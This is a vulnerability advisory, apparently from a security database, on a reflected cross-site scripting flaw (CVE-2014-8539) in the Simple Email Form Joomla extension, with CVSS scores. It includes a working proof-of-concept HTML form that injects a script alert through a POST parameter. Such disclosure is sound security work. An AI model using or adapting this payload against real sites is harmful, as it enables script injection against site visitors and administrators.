Lucene search

K
htbridgeHigh-Tech BridgeHTB23241
HistoryOct 29, 2014 - 12:00 a.m.

Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension

2014-10-2900:00:00
High-Tech Bridge
www.htbridge.com
20

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.002 Low

EPSS

Percentile

59.2%

High-Tech Bridge Security Research Lab discovered vulnerability in Simple Email Form Joomla Extension, which can be exploited to perform Cross-Site Scripting (XSS) attacks against visitors and administrators of Joomla websites with installed plugin.

  1. Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension: CVE-2014-8539

Input passed via the “mod_simpleemailform_field2_1” HTTP POST parameter to “/index.php” script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.

The exploitation example below uses the “alert()” JavaScript function to display “immuniweb” word:

<form action=“http://[host]/index.php” method=“post” name=“main”>
<input type=“hidden” name=“mod_simpleemailform_field1_1” value="[email protected]">
<input type=“hidden” name=“mod_simpleemailform_field2_1” value=‘"><script>alert(“immuniweb”);</script>’>
<input type=“hidden” name=“mod_simpleemailform_submit_1” value=“Submit”>
<input type=“submit” id=“btn”>
</form>

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.002 Low

EPSS

Percentile

59.2%